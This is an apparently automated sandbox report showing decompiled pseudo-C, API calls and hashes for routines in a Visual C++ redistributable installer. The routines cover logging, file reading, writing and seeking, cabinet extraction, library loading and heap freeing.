                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: StringVariant$AllocClearFreeInit
                                                                          • String ID: xmlutil.cpp
                                                                          • API String ID: 760788290-1270936966
                                                                          • Opcode ID: f9908137c473a14a2e6457ca031625cbfa76c8dd5e0c61e44ff1e6bf9d0122b0
                                                                          • Instruction ID: 739f52fc32155b1b82348bd0c94cbef72389bdbf28e4bb717dd4b00726e156b5
                                                                          • Opcode Fuzzy Hash: f9908137c473a14a2e6457ca031625cbfa76c8dd5e0c61e44ff1e6bf9d0122b0
                                                                          • Instruction Fuzzy Hash: 0E21B735901619EFDB20DBA8C849EAFBBB8EF44752F154158FD05AB210CB35DE04CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00050658 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62filestringCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 96%
                                                                          			E00050658(void* __ecx, void* __edx, CHAR* _a4) {
				long _v8;
				int _t9;
				void* _t16;
				CHAR* _t18;
				void* _t21;
				void* _t22;
				void* _t25;
				void* _t28;

				_t22 = __edx;
				_push(__ecx);
				_t18 = _a4;
				_t28 = 0;
				_t25 = 0;
				_v8 = _v8 & 0;
				_t9 = lstrlenA(_t18);
				_t21 =  *0x7a774; // 0xffffffff
				_a4 = _t9;
				if(_t21 != 0xffffffff) {
					if(_t9 == 0) {
						L9:
						return _t28;
					}
					L4:
					while(1) {
						if(WriteFile(_t21, _t25 + _t18, _t9 - _t25,  &_v8, 0) != 0) {
							L6:
							_t25 = _t25 + _v8;
							_t9 = _a4;
							if(_t25 >= _t9) {
								goto L9;
							}
							_t21 =  *0x7a774; // 0xffffffff
							continue;
						}
						_t28 =  <=  ? GetLastError() : _t14 & 0x0000ffff | 0x80070000;
						if(_t28 < 0) {
							E000137D3(_t14, "logutil.cpp", 0x310, _t28);
							goto L9;
						}
						goto L6;
					}
				}
				_t16 = E00012384(_t21, _t22, 0x7b608, _t18, 0); // executed
				_t28 = _t16;
				if(_t28 >= 0) {
					_t28 = 0;
				}
				goto L9;
			}











                                                                          0x00050658
                                                                          0x0005065b
                                                                          0x0005065d
                                                                          0x00050662
                                                                          0x00050664
                                                                          0x00050666
                                                                          0x0005066a
                                                                          0x00050670
                                                                          0x00050676
                                                                          0x0005067c
                                                                          0x00050696
                                                                          0x000506ea
                                                                          0x000506f2
                                                                          0x000506f2
                                                                          0x00000000
                                                                          0x00050698
                                                                          0x000506ae
                                                                          0x000506c8
                                                                          0x000506c8
                                                                          0x000506cb
                                                                          0x000506d0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000506d2
                                                                          0x00000000
                                                                          0x000506d2
                                                                          0x000506c1
                                                                          0x000506c6
                                                                          0x000506e5
                                                                          0x00000000
                                                                          0x000506e5
                                                                          0x00000000
                                                                          0x000506c6
                                                                          0x00050698
                                                                          0x00050685
                                                                          0x0005068a
                                                                          0x0005068e
                                                                          0x00050690
                                                                          0x00050690
                                                                          0x00000000

                                                                          APIs
                                                                          • lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,?,0004FF0B,?,?,00000000,00000000,0000FDE9), ref: 0005066A
                                                                          • WriteFile.KERNEL32(FFFFFFFF,00000000,00000000,00000000,00000000,?,?,0004FF0B,?,?,00000000,00000000,0000FDE9), ref: 000506A6
                                                                          • GetLastError.KERNEL32(?,?,0004FF0B,?,?,00000000,00000000,0000FDE9), ref: 000506B0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWritelstrlen
                                                                          • String ID: @Met$logutil.cpp
                                                                          • API String ID: 606256338-637279948
                                                                          • Opcode ID: 9bdad14addcf23d0b3a5052bd2f86cfb8e27a1ba68a21572b111eb3bc3ff2c66
                                                                          • Instruction ID: e0c0b755d6fd8242acd6600c1245ae0a9c2a0ecf08136d37cc1daf3944162bc9
                                                                          • Opcode Fuzzy Hash: 9bdad14addcf23d0b3a5052bd2f86cfb8e27a1ba68a21572b111eb3bc3ff2c66
                                                                          • Instruction Fuzzy Hash: 6A11E576A01324ABE3209A7ACC48EAFBAACEBC5762B004215FD05E7140E734AD10C6E0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0003074E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 52fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 63%
                                                                          			E0003074E(void* __ecx, void* __eflags, void* _a4, void* _a8, long _a12) {
				long _v8;
				int _t19;
				signed short _t22;
				signed int _t27;
				intOrPtr _t31;
				struct _OVERLAPPED* _t34;

				_t27 =  *0x7aac0; // 0x0
				_t34 = 0;
				_v8 = 0;
				_t31 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t27 * 4)) + 4));
				E0003114F(__eflags, _t31 + 0x1c, _a4, _a12); // executed
				_t19 = ReadFile(_a4, _a8, _a12,  &_v8, 0); // executed
				if(_t19 == 0) {
					_t22 = GetLastError();
					_t38 =  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
					_t34 =  >=  ? 0x80004005 :  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "cabextract.cpp", 0x2ec, _t34);
					_push("Failed to read during cabinet extraction.");
					E0005012F();
					_t27 = _t34;
				}
				 *((intOrPtr*)(_t31 + 0x30)) = _t34;
				_t21 =  <  ? _t27 | 0xffffffff : _v8;
				return  <  ? _t27 | 0xffffffff : _v8;
			}









                                                                          0x00030752
                                                                          0x00030766
                                                                          0x0003076b
                                                                          0x0003076e
                                                                          0x00030778
                                                                          0x0003078b
                                                                          0x00030793
                                                                          0x00030795
                                                                          0x000307a6
                                                                          0x000307b0
                                                                          0x000307be
                                                                          0x000307c3
                                                                          0x000307c9
                                                                          0x000307cf
                                                                          0x000307cf
                                                                          0x000307d0
                                                                          0x000307dc
                                                                          0x000307e3

                                                                          APIs
                                                                            • Part of subcall function 0003114F: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,0003077D,?,?,?), ref: 00031177
                                                                            • Part of subcall function 0003114F: GetLastError.KERNEL32(?,0003077D,?,?,?), ref: 00031181
                                                                          • ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 0003078B
                                                                          • GetLastError.KERNEL32 ref: 00030795
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLast$PointerRead
                                                                          • String ID: @Met$Failed to read during cabinet extraction.$cabextract.cpp
                                                                          • API String ID: 2170121939-2568642345
                                                                          • Opcode ID: acd500e1b81429c3fc42734d112efdb1782f2e829c6d95d80f2de3c54f43d1ea
                                                                          • Instruction ID: 4f973767848a904378dd558d85cd88db781a88d310ad3eeed5139f0019b93fed
                                                                          • Opcode Fuzzy Hash: acd500e1b81429c3fc42734d112efdb1782f2e829c6d95d80f2de3c54f43d1ea
                                                                          • Instruction Fuzzy Hash: 9701A572A00625BBDB11AFA9DC05EDB7BADFF09760F010119FD08E7550D7359A108BD4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0003114F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 46COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 31%
                                                                          			E0003114F(void* __eflags, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				int _t11;
				void* _t19;
				long _t20;

				_t20 = 0x80070490;
				_t19 = E00031127(_a4, _a8);
				if(_t19 != 0) {
					_t20 = 0;
					_push(0);
					_t11 = SetFilePointerEx(_a8,  *(_t19 + 8),  *(_t19 + 0xc), 0); // executed
					if(_t11 != 0) {
						 *(_t19 + 8) =  *(_t19 + 8) + _a12;
						asm("adc [edi+0xc], esi");
					} else {
						_t23 =  <=  ? GetLastError() : _t12 & 0x0000ffff | 0x80070000;
						_t20 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t12 & 0x0000ffff | 0x80070000;
						E000137D3(0x80004005, "cabextract.cpp", 0x37e, _t20);
						_push("Failed to move to virtual file pointer.");
						_push(_t20);
						E0005012F();
					}
				}
				return _t20;
			}






                                                                          0x00031157
                                                                          0x00031164
                                                                          0x00031168
                                                                          0x0003116a
                                                                          0x0003116c
                                                                          0x00031177
                                                                          0x0003117f
                                                                          0x000311c1
                                                                          0x000311c4
                                                                          0x00031181
                                                                          0x00031192
                                                                          0x0003119c
                                                                          0x000311aa
                                                                          0x000311af
                                                                          0x000311b4
                                                                          0x000311b5
                                                                          0x000311bb
                                                                          0x0003117f
                                                                          0x000311cc

                                                                          APIs
                                                                          • SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,0003077D,?,?,?), ref: 00031177
                                                                          • GetLastError.KERNEL32(?,0003077D,?,?,?), ref: 00031181
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastPointer
                                                                          • String ID: @Met$Failed to move to virtual file pointer.$cabextract.cpp
                                                                          • API String ID: 2976181284-1626086099
                                                                          • Opcode ID: 43f5124eba228c8275e2028fee047b616fea9a7c753c7a3391a6d8426c8abbb4
                                                                          • Instruction ID: 47c6913ecf044b138a95f79102cba4b6a29df9ef8011d98b9f816efe4ec4922f
                                                                          • Opcode Fuzzy Hash: 43f5124eba228c8275e2028fee047b616fea9a7c753c7a3391a6d8426c8abbb4
                                                                          • Instruction Fuzzy Hash: A901D637640736BBD7221AA69C04ED7BFA9EF457B1B018125FE0C96550D735DC20CAE4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00053DB5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 101fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 86%
                                                                          			E00053DB5(signed short __edx, void* _a4, intOrPtr _a8, intOrPtr _a12, signed short _a16, intOrPtr* _a20) {
				signed int _v8;
				void _v4104;
				long _v4108;
				intOrPtr _v4112;
				long _v4116;
				void* _v4120;
				intOrPtr _v4124;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t32;
				long _t37;
				int _t39;
				signed short _t40;
				long _t45;
				void* _t47;
				intOrPtr* _t49;
				void* _t50;
				intOrPtr _t55;
				signed short _t56;
				intOrPtr _t58;
				void* _t59;
				signed short _t64;
				void* _t65;
				signed int _t66;
				void* _t73;

				_t56 = __edx;
				E00059F00();
				_t32 =  *0x7a008; // 0xfbf51acb
				_v8 = _t32 ^ _t66;
				asm("xorps xmm0, xmm0");
				_t49 = _a20;
				asm("movlpd [ebp-0x100c], xmm0");
				_v4120 = _a4;
				_t58 = _v4112;
				_v4124 = _a8;
				_v4116 = _v4108;
				do {
					if(_a12 != 0 || _a16 != 0) {
						_t56 = _a16;
						_t37 = _a12 - _t58;
						asm("sbb edx, ecx");
						__eflags = _t56;
						if(__eflags < 0) {
							L8:
							_v4108 = _t56;
							goto L9;
						}
						if(__eflags > 0) {
							L7:
							_v4108 = _v4108 & 0x00000000;
							_t37 = 0x1000;
							goto L9;
						}
						__eflags = _t37 - 0x1000;
						if(_t37 <= 0x1000) {
							goto L8;
						}
						goto L7;
					} else {
						_t37 = 0x1000;
						L9:
						_v4108 = _t37;
						_t39 = ReadFile(_v4120,  &_v4104, _t37,  &_v4108, 0); // executed
						if(_t39 == 0) {
							_t40 = GetLastError();
							__eflags = _t40;
							_t64 =  <=  ? _t40 : _t40 & 0x0000ffff | 0x80070000;
							__eflags = _t64;
							_t61 =  >=  ? 0x80004005 : _t64;
							E000137D3(0x80004005, "fileutil.cpp", 0x407,  >=  ? 0x80004005 : _t64);
							L20:
							_pop(_t59);
							_pop(_t65);
							_pop(_t50);
							return E0003DE36(_t50, _v8 ^ _t66, _t56, _t59, _t65);
						}
						_t45 = _v4108;
						if(_t45 == 0) {
							goto L13;
						}
						_t47 = E00054CEE( &_v4108, _v4124,  &_v4104, _t45); // executed
						if(_t47 < 0) {
							goto L20;
						}
						_t45 = _v4108;
					}
					L13:
					_t55 = _v4116;
					_t58 = _t58 + _t45;
					asm("adc ecx, 0x0");
					_v4116 = _t55;
					_t73 = _t55 - _a16;
				} while (_t73 <= 0 && (_t73 < 0 || _t58 < _a12) && _t45 != 0);
				if(_t49 != 0) {
					 *_t49 = _t58;
					 *((intOrPtr*)(_t49 + 4)) = _t55;
				}
				goto L20;
			}






























                                                                          0x00053db5
                                                                          0x00053dbd
                                                                          0x00053dc2
                                                                          0x00053dc9
                                                                          0x00053dcf
                                                                          0x00053dd3
                                                                          0x00053dd7
                                                                          0x00053de7
                                                                          0x00053df1
                                                                          0x00053df7
                                                                          0x00053dfd
                                                                          0x00053e03
                                                                          0x00053e07
                                                                          0x00053e19
                                                                          0x00053e1c
                                                                          0x00053e1e
                                                                          0x00053e20
                                                                          0x00053e22
                                                                          0x00053e3b
                                                                          0x00053e3b
                                                                          0x00000000
                                                                          0x00053e3b
                                                                          0x00053e24
                                                                          0x00053e2d
                                                                          0x00053e2d
                                                                          0x00053e34
                                                                          0x00000000
                                                                          0x00053e34
                                                                          0x00053e26
                                                                          0x00053e2b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00053e0f
                                                                          0x00053e0f
                                                                          0x00053e41
                                                                          0x00053e49
                                                                          0x00053e5e
                                                                          0x00053e66
                                                                          0x00053ec1
                                                                          0x00053ed0
                                                                          0x00053ed2
                                                                          0x00053eda
                                                                          0x00053edc
                                                                          0x00053eea
                                                                          0x00053eef
                                                                          0x00053ef4
                                                                          0x00053ef5
                                                                          0x00053ef8
                                                                          0x00053f01
                                                                          0x00053f01
                                                                          0x00053e68
                                                                          0x00053e70
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00053e80
                                                                          0x00053e89
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00053e8b
                                                                          0x00053e8b
                                                                          0x00053e91
                                                                          0x00053e91
                                                                          0x00053e97
                                                                          0x00053e99
                                                                          0x00053e9c
                                                                          0x00053ea2
                                                                          0x00053ea2
                                                                          0x00053eb8
                                                                          0x00053eba
                                                                          0x00053ebc
                                                                          0x00053ebc
                                                                          0x00000000

                                                                          APIs
                                                                          • ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00053E5E
                                                                          • GetLastError.KERNEL32 ref: 00053EC1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastRead
                                                                          • String ID: @Met$fileutil.cpp
                                                                          • API String ID: 1948546556-2299628883
                                                                          • Opcode ID: 6e81877a6014982ea4467870ad46050b5caf5b2b3565cad8ef201f402c4db3ac
                                                                          • Instruction ID: 8070cb080e5c3433e41d14eb7924cfcd84b08f4039685fb4dd7d17a966ed3b01
                                                                          • Opcode Fuzzy Hash: 6e81877a6014982ea4467870ad46050b5caf5b2b3565cad8ef201f402c4db3ac
                                                                          • Instruction Fuzzy Hash: B0414F71E002699BDB61CE54CC417EBB7E8EF48792F0041A6AD49E7280D7B49EC89B90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000137EA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79libraryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E000137EA(void* __edx, intOrPtr _a4, struct HINSTANCE__** _a8, intOrPtr _a12) {
				signed int _v8;
				short _v528;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t15;
				signed int _t20;
				void* _t22;
				struct HINSTANCE__* _t26;
				signed short _t27;
				void* _t31;
				struct HINSTANCE__** _t32;
				void* _t33;
				void* _t36;
				intOrPtr _t37;
				signed int _t42;

				_t36 = __edx;
				_t15 =  *0x7a008; // 0xfbf51acb
				_v8 = _t15 ^ _t42;
				_t32 = _a8;
				_t37 = _a12;
				E0003F670(_t37,  &_v528, 0, 0x208);
				_t38 = 0x104;
				_t20 = GetSystemDirectoryW( &_v528, 0x104);
				if(_t20 != 0) {
					_t33 = 0x5c;
					if(_t33 ==  *((intOrPtr*)(_t42 + _t20 * 2 - 0x20e))) {
						L6:
						_t22 = E000136B4(_t33,  &_v528, _t38, _a4);
						_t39 = _t22;
						if(_t22 < 0) {
							L10:
							return E0003DE36(_t32, _v8 ^ _t42, _t36, _t37, _t39);
						}
						_t26 = LoadLibraryW( &_v528); // executed
						 *_t32 = _t26;
						if(_t26 == 0) {
							goto L1;
						}
						if(_t37 != 0) {
							_t39 = E000121A5(_t37,  &_v528, 0x104);
						}
						goto L10;
					}
					_t31 = E00013665(_t33,  &_v528, 0x104, "\\", 1);
					_t39 = _t31;
					if(_t31 < 0) {
						goto L10;
					} else {
						_t38 = 0x104;
						goto L6;
					}
				}
				L1:
				_t27 = GetLastError();
				_t39 =  <=  ? _t27 : _t27 & 0x0000ffff | 0x80070000;
				if(( <=  ? _t27 : _t27 & 0x0000ffff | 0x80070000) >= 0) {
					_t39 = 0x80004005;
				}
				goto L10;
			}




















                                                                          0x000137ea
                                                                          0x000137f3
                                                                          0x000137fa
                                                                          0x000137fe
                                                                          0x00013809
                                                                          0x00013814
                                                                          0x00013822
                                                                          0x00013829
                                                                          0x00013831
                                                                          0x00013854
                                                                          0x0001385d
                                                                          0x0001387e
                                                                          0x00013889
                                                                          0x0001388e
                                                                          0x00013892
                                                                          0x000138bf
                                                                          0x000138d1
                                                                          0x000138d1
                                                                          0x0001389b
                                                                          0x000138a1
                                                                          0x000138a5
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000138a9
                                                                          0x000138bd
                                                                          0x000138bd
                                                                          0x00000000
                                                                          0x000138a9
                                                                          0x0001386e
                                                                          0x00013873
                                                                          0x00013877
                                                                          0x00000000
                                                                          0x00013879
                                                                          0x00013879
                                                                          0x00000000
                                                                          0x00013879
                                                                          0x00013877
                                                                          0x00013833
                                                                          0x00013833
                                                                          0x00013844
                                                                          0x00013849
                                                                          0x0001384b
                                                                          0x0001384b
                                                                          0x00000000

                                                                          APIs
                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00013829
                                                                          • GetLastError.KERNEL32 ref: 00013833
                                                                          • LoadLibraryW.KERNELBASE(?,?,00000104,?), ref: 0001389B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: DirectoryErrorLastLibraryLoadSystem
                                                                          • String ID: @Met
                                                                          • API String ID: 1230559179-2381362037
                                                                          • Opcode ID: 71bdbe5869f60907d9075dc331a1d389f6de140408b67a77dbcd58cc370a04f7
                                                                          • Instruction ID: 9ead2b5a782eeb8e2a227e7ccea4e9b718541e8eacf7dfd5570740712976cce7
                                                                          • Opcode Fuzzy Hash: 71bdbe5869f60907d9075dc331a1d389f6de140408b67a77dbcd58cc370a04f7
                                                                          • Instruction Fuzzy Hash: 1A21AAB6D0132967EB20DB649C45FDBB7ACAB44710F114165BD04E7241EA35EE8887E0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00054CEE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00054CEE(void* __ecx, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				long _v8;
				int _t14;
				intOrPtr _t19;
				void* _t23;
				void* _t26;

				_t19 = _a8;
				_t26 = 0;
				_v8 = _v8 & 0;
				_t23 = 0;
				do {
					_t14 = WriteFile(_a4, _t23 + _t19, _a12 - _t23,  &_v8, 0); // executed
					if(_t14 != 0) {
						goto L3;
					} else {
						_t26 =  <=  ? GetLastError() : _t16 & 0x0000ffff | 0x80070000;
						if(_t26 < 0) {
							E000137D3(_t16, "fileutil.cpp", 0x3e7, _t26);
						} else {
							goto L3;
						}
					}
					L6:
					return _t26;
					L3:
					_t23 = _t23 + _v8;
				} while (_t23 < _a12);
				goto L6;
			}








                                                                          0x00054cf3
                                                                          0x00054cf7
                                                                          0x00054cf9
                                                                          0x00054cfd
                                                                          0x00054cff
                                                                          0x00054d12
                                                                          0x00054d1a
                                                                          0x00000000
                                                                          0x00054d1c
                                                                          0x00054d2d
                                                                          0x00054d32
                                                                          0x00054d49
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00054d32
                                                                          0x00054d4e
                                                                          0x00054d56
                                                                          0x00054d34
                                                                          0x00054d34
                                                                          0x00054d37
                                                                          0x00000000

                                                                          APIs
                                                                          • WriteFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00053E85,?,?,?), ref: 00054D12
                                                                          • GetLastError.KERNEL32(?,?,00053E85,?,?,?), ref: 00054D1C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWrite
                                                                          • String ID: @Met$fileutil.cpp
                                                                          • API String ID: 442123175-2299628883
                                                                          • Opcode ID: 4afc3e2669dd70881824d35d458dc8e8a47aee1234f9591f1ebfefb147bcc63c
                                                                          • Instruction ID: 3f9420624fdef6cbe813b6cfe6f8ebf8c8ded8f2c09e1c2ad0e3f362424fbacf
                                                                          • Opcode Fuzzy Hash: 4afc3e2669dd70881824d35d458dc8e8a47aee1234f9591f1ebfefb147bcc63c
                                                                          • Instruction Fuzzy Hash: 00F08172A01229BBD7109E9ACC48EEFBBADFB44762F004116FD05D7040D631AD4086F1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000547D3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 89%
                                                                          			E000547D3(void* __ecx, void* _a4, union _LARGE_INTEGER _a8, union _LARGE_INTEGER* _a12, intOrPtr* _a16, intOrPtr _a20) {
				intOrPtr _v8;
				void* _v12;
				int _t11;
				intOrPtr* _t12;
				void* _t21;

				_push(_a20);
				_t21 = 0;
				_t11 = SetFilePointerEx(_a4, _a8, _a12,  &_v12); // executed
				if(_t11 != 0) {
					_t12 = _a16;
					if(_t12 != 0) {
						 *_t12 = _v12;
						 *((intOrPtr*)(_t12 + 4)) = _v8;
					}
				} else {
					_t25 =  <=  ? GetLastError() : _t14 & 0x0000ffff | 0x80070000;
					_t21 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t14 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "fileutil.cpp", 0x20a, _t21);
				}
				return _t21;
			}








                                                                          0x000547d9
                                                                          0x000547df
                                                                          0x000547eb
                                                                          0x000547f3
                                                                          0x00054825
                                                                          0x0005482a
                                                                          0x0005482f
                                                                          0x00054834
                                                                          0x00054834
                                                                          0x000547f5
                                                                          0x00054806
                                                                          0x00054810
                                                                          0x0005481e
                                                                          0x0005481e
                                                                          0x0005483d

                                                                          APIs
                                                                          • SetFilePointerEx.KERNELBASE(?,?,?,?,?,00000000,?,?,?,00028564,00000000,00000000,00000000,00000000,00000000), ref: 000547EB
                                                                          • GetLastError.KERNEL32(?,?,?,00028564,00000000,00000000,00000000,00000000,00000000), ref: 000547F5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastPointer
                                                                          • String ID: @Met$fileutil.cpp
                                                                          • API String ID: 2976181284-2299628883
                                                                          • Opcode ID: 2c0ec5e4397eeca90825c4181eb26b08dc4932a8c2f39bba11afe1b3c50b6a91
                                                                          • Instruction ID: 12172e95711e90b86334c86fb25769670100953715e01051bdfb1eda99bf516d
                                                                          • Opcode Fuzzy Hash: 2c0ec5e4397eeca90825c4181eb26b08dc4932a8c2f39bba11afe1b3c50b6a91
                                                                          • Instruction Fuzzy Hash: EAF08171A00319AFEB208F95CC08DAB7BE8EF04755B014119FD09D7250D631DC50DBE4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00013999 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00013999(void* _a4) {
				char _t3;
				long _t6;

				_t6 = 0;
				_t3 = RtlFreeHeap(GetProcessHeap(), 0, _a4); // executed
				if(_t3 == 0) {
					_t6 =  <=  ? GetLastError() : _t5 & 0x0000ffff | 0x80070000;
				}
				return _t6;
			}





                                                                          0x000139a0
                                                                          0x000139aa
                                                                          0x000139b2
                                                                          0x000139c5
                                                                          0x000139c5
                                                                          0x000139cc

                                                                          APIs
                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00013B34,00000000,?,00011472,00000000,80004005,00000000,80004005,00000000,000001C7,?,000113B7), ref: 000139A3
